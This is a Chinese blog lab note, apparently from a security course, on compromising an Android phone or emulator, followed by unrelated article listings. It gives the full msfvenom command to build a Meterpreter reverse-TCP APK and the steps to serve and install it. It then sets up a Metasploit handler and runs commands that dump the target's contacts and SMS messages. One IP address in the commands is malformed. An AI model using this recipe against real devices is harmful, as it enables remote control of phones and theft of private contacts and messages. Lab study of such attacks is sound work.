第二天-03-安卓手机的入侵实验

2023-11-06

安卓手机入侵实验

要求：

电脑主机与手机模拟器或者真机在当前环境下，网络是畅通的，相互之间可以进行通信。

如何进行测试网络环境：

我们首先需要确定IP。

linux通过终端命令 # ip a 或者 #ifconfig

windown下：win加r输入cmd调出终端，使用ipconfig查看ip地址。

kali下：

在这里插入图片描述

Android模拟器下：

在这里插入图片描述

在这里插入图片描述

在安卓真机下：打开wifi

在这里插入图片描述

操作：

知道IP后使用ping命令测试是否可以连通。

终端下命令：

ping 目标主机ip

在这里插入图片描述

测试步骤：

可以ping通后开始进行入侵测试：

使用msfvenom生成一个连接kali主机的apk安卓应用

lhost=192.168.1.10 （这是Kali的IP），lport=4444 （默认4444）端口，1.apk（生成apk的名字）

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk

在这里插入图片描述

home下点开test

apk安卓应用上传到安卓手机

步骤一：kali开启HTTP服务80端口

命令：

python3 -m http.server 80

在这里插入图片描述

步骤二：安卓下通过ip访问网站下载

模拟器下有bug可以通过

终端下命令：切换路径 cd /sdcard

开始下载 wget ip/apk文件

真机可以直接浏览器下输入ip地址访问

安卓下载安装完成并且给与程序权限

在这里插入图片描述

3. 回到kali

输入命令启动msfconsole

在这里插入图片描述

选择工具模块

命令：

use exploit/multi/handler
1. 设置攻击载荷
  
  set payload android/meterpreter/reverse_tcp

在这里插入图片描述

设置监听方ip地址（kali的IP地址）

set LHOST ip
设置端口

set LPORT 4444
run运行
回到安卓点击安装的程序
kali下可以执行操作了

查看目标安卓手机通讯录：dump_contacts

完成后的文件保存在home，目录下

查看目标手机短信：dump_sms

在这里插入图片描述

至此操作完成

补充：

可以使用help 查看命令帮助

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

网络安全学习

Android

网络

第二天-03-安卓手机的入侵实验的相关文章

模仿 youtube/gmail 应用程序的导航抽屉

背景近几个月来谷歌发布了Youtube 应用程序 http www androidpolice com 2013 08 19 breaking massive youtube for android v5 0 update brings
Android Room ORM：支持 SQLite 的自定义构建

我需要使用 SQLite 的自定义构建基于 sqlite org 版本https sqlite org android doc trunk www index wiki https sqlite org android doc trunk
使用 ActiveAndroid 库存储 HashMap

我有一堂课 Table name Control public class Control extends Model Column private String name Column private Map
在 Android 中从麦克风录制 wav 文件 - 问题

我需要能够使用 Android 中的麦克风创建 WAV 文件目前我遇到了很多麻烦到目前为止这就是我的情况我正在使用 micDroid 项目代码的一部分来记录 read thread int sampleRate 44100 int
Android模拟器中的互联网连接始终显示连接状态

我尝试了多种方法来检查我的 Android 模拟器中的互联网连接 ConnectivityManager conMgr ConnectivityManager getSystemService Context CONNECTIVITY SE
视图无法解析为类型

这里的视图似乎有什么问题我该如何解决它错误视图无法解析为类型 public void onItemClick AdapterView
片段内容下方是否存在持久性 BottomSheet？

Using a 持久底表 https material google com components bottom sheets html bottom sheets persistent bottom sheets 在一个协调器布局 htt
如何使用数据绑定将点击侦听器设置为 LinearLayout

我目前正在尝试将点击侦听器设置为LinearLayout查看在 xml使用数据绑定的布局文件我已经设法让它在其他视图上很好地工作比如Button or TextView 但由于某种原因它不能与LinearLayout 这是我尝试的基本
Android：文本淡入和淡出

我已阅读此 stackoverflow 问题和答案并尝试实现文本淡入和淡出 Android中如何让文字淡入淡出 https stackoverflow com questions 8627211 how to make text fade
Android中如何使用JNI获取设备ID？

我想从 c 获取 IMEIJNI 我使用下面的代码但是遇到了未能获取的错误cls 它总是返回NULL 我检查了环境和上下文它们都没有问题为什么我不能得到Context班级我在网上搜索了一下有人说我们应该使用java lang Ob
更新到 Kotlin 1.3.30 后出现“未解析的引用：Parcelize”

我使用 Kotlin 1 3 21 很长时间了kotlin android extensions插件长期处于实验模式今天我通过升级版本切换到 Kotlin 1 3 30 现在无论我使用什么 Parcelize注释我看到错误 Unresol
如何向 Android Studio 中的现有项目添加新活动？

在 Eclipse 中您只需单击新建按钮并选择 Android 活动即可添加新活动但 Android Studio 有点不同我无法找到如何向项目添加新活动要添加一个Activity使用 Android Studio 此步骤与添加
在 Android 中跨单元测试和仪器测试共享资源

现在谷歌已经添加了实验单元测试支持 http tools android com tech docs unit testing support 如何在单元测试和仪器测试之间共享资源例如假设我有一个TestUtils java我希望在单元
在 Xamarin 中隐藏软键盘

如何隐藏软键盘以便在聚焦时显示Entry在 Xamarin forms 便携式表单项目中我假设我们必须为此编写特定于平台的渲染器但以下内容不起作用我创建自己的条目子类 public class MyExtendedEntry Entr
Jetpack Compose 中复选框中的透明复选标记

在我的 Compose 应用程序中我需要创建一个圆形复选框我已经通过下面的代码实现了这一点 Composable fun CircleCheckBox isChecked Boolean modifier Modifier Modifi
Android 为什么这不会抛出错误的线程异常？

我的印象是视图只能从主线程操作但是为什么这不会崩溃 public class MainActivity extends Activity TextView tv Override protected void onCreate Bund
React Native HTTPS Api 调用在 IOS 中有效，但在 Android 中无效

所以基本上我所做的就是简单地对启用了 HTTPS 的 UAT 服务器进行简单的 Axios 调用我已经在 IOS 中测试了整个应用程序 API 调用工作正常但一旦我在 Android 中测试了相同的应用程序在真正的 Android 设
如何使用 isInEditMode() 在编辑器中查看自定义视图的布局

我必须编辑一个具有自定义视图的软件当我尝试编辑布局 xml 时 Eclipse 告诉我在自定义视图中使用 View isInEditMode 可以在显示时跳过代码在日食中但我不知道how and where我必须使用isInEdit
Android S8+ 警告消息“不支持当前的显示尺寸设置，可能会出现意外行为”

我在 Samsung S8 Android 7 中收到此警告消息 APP NAME 不支持当前的显示尺寸设置可能会行为出乎意料它意味着什么以及如何删除它谢谢通过添加解决supports screens 机器人 xlargeScre
android系统用户和linux root用户有什么区别

当我将手机连接到电脑并使用adb shell与我的手机通信并输入的命令ps命令输出当前在我的手机上运行的进程信息我发现有两个特殊用户一个是root 另一个是system 据我所知 Android是基于linux的所以root用户是最大

随机推荐

高光谱遥感图像处理（14）-----ENVI使用教程之监督分类与非监督分类

监督分类又称训练分类法用被确认类别的样本像元去识别其他未知类别像元的过程它是在分类之前通过目视判读和野外调查对遥感图像上某些样区中影像地物的类别属性有了先验知识对每一种类别选取一定数量的训练样本计算机计算每种训练样区的统计或其他
Maven本地仓库位置设置和实际读取不正确问题

今天发现自己的项目的maven本地仓库不是默认的位置默认位置一般是 C Users 用户名 m2 repository 然后我在idea中尝试变更本地仓库位置变更之后发现读取的位置没有发现变化不是自己这里设置的位置后来发现在
3.1.2 Hive on Spark配置

3 1 2 Hive on Spark配置 1 兼容性说明注意官网下载的Hive3 1 2和Spark3 0 0默认是不兼容的因为Hive3 1 2支持的Spark版本是2 4 5 所以需要我们重新编译Hive3 1 2版本编译步骤
李开复：创业开始别想太高年轻人多看国外网站

新浪科技讯 10月30日下午消息据多家台湾媒体报道创新工场董事长兼首席执行官李开复今天在台湾参加远见第12届华人企业领袖远见高峰会他指出台湾创业环境没转好建议台湾创业团队没必要一开始想太高太大应先解决用户的小问题李开复去
Java 生成随机数全数字方式

生成9位随机数字 System out println int Math random 9 1 100000000 生成8位随机数字 System out println int Math random 9 1 10000000 生成6位随
Visual Studio 2015/2017/2019 设置透明主题、个性背景（含异常解决方法）

Visual Studio 2015 2017 2019主题设置透明主题个性背景 1 首先打开工具 gt 扩展与更新分别下载和安装以下两个插件如果出现下载或安装异常可点击右上的详细信息单独下载安装注如果找不到moeide 可以
php7.4 安装xdebug3.1.3扩展

一检测需要的xdebug版本使用网站 Xdebug Support Tailored Installation Instructions 可以参考这篇文章 phpStorm 安装使用xdebug断点调试流程墨眉 CSDN博客得出我
C++参数传递

C 参数传递目录 C 参数传递 1 基本参数传递方式按值传递指针传递引用传递总结 2 指针与引用区别 3 参数为指针的指针或指针的引用 1 void func char a 2 void func1 char a 3 void f
Apache SSHD服务端：ssh2、sftp 登录验证超时时间、连接断开超时时间

通过ssh2 sftp协议连接基于Apache MINA SSHD的服务时长时间不用连接会自动断开我们来看一下默认断开时间和如何修改断开时间超时报错日志 Disconnecting ServerSessionImpl username
ubuntu 服务管理运行程序 sysv-rc-conf

sysv rc conf是一个强大的服务管理程序 Ubuntu运行级别Linux 系统任何时候都运行在一个指定的运行级上不同的运行级的程序和服务都不同所要完成的工作和要达到的目的不同系统可以在这些运行级之间进行切换以完成不同的工作
socket包长度问题: send recieve(转载)

一个包没有固定长度以太网限制在46 1500字节 1500就是以太网的MTU 超过这个量 TCP会为IP数据报设置偏移量进行分片传输现在一般可允许应用层设置8k NTFS系的缓冲区 8k的数据由底层分片而应用看来只是一次发送 win
C语言标识符、合法常量、转义字符

一合法标识符用户定义的合法标识符需满足以下两个要求标识符只能由字母数字和下划线组成标识符不能以数字开头二合法常量整型常量十进制 10 八进制 017 以0开头不能出现8 9 十六进制 0xA1 以0x开头实型常量强调
Mac安装python

一下载python 官网地址 https www python org downloads macos 目前主流版本应该是3 7 3 8 3 9 文章以3 8为例作者已将下载包放到网盘方便取用网盘地址 https pan baidu
Ngrok 内网穿透

一配置Ngrok 准备内网穿透 1 到ngrok官网去注册一个号国内也有一个sunny ngrok 但是我用来几次全部失败了所以推荐国外的网址是 https ngrok com 2 我注册的时候面临验证码刷不出来所以建议直接用gi
MVB通讯机制

MVB通信只能是主从式通信主站配置调度表轮询各从站从站应答主站命令采用广播式发送 MVB网络上其他节点过滤地接收网络上的信息首发待学习指导
elastic-job详解（一）：数据分片

数据分片的目的在于把一个任务分散到不同的机器上运行既可以解决单机计算能力上限的问题也能降低部分任务失败对整体系统的影响 elastic job并不直接提供数据处理的功能框架只会将分片项分配至各个运行中的作业服务器其实是Job实例部
html表格怎么绑定数据类型,Excel中表格添加数据标签及设置格式的操作方法

Excel图表以其直观的展示功能深受用户喜爱但有些初学者对于生成图表后如何添加数据标签有所困扰今天学习啦小编就教大家在Excel中表格添加数据标签及设置格式的操作方法 Excel中表格添加数据标签及设置格式的操作步骤如下 1 在Exc
Google地图现可按照路况给出出行时间

在 Google Maps 查询出行路线的时候不管是公交还是自驾它都会告诉你一个大概的全部行程需要的时间不过如果你是在下午 5 点左右从北京出发的话那个时间显然是痴人说梦由于 Google Maps 本身在很多城市已经有了交通流量
谷粒商城--整合Elasticsearch和商品的上架

整合Elasticsearch和商品的上架一整合ES ES常用概念索引类型文档是什么倒排索引相关度分数score的计算安装ES和Kibana 快速安装 ES kibana 初步检索 cat ES的增删改查新增文档 put新
第二天-03-安卓手机的入侵实验

安卓手机入侵实验要求电脑主机与手机模拟器或者真机在当前环境下网络是畅通的相互之间可以进行通信如何进行测试网络环境我们首先需要确定IP linux通过终端命令 ip a 或者 ifconfig windown下 win加r输入cm

热门标签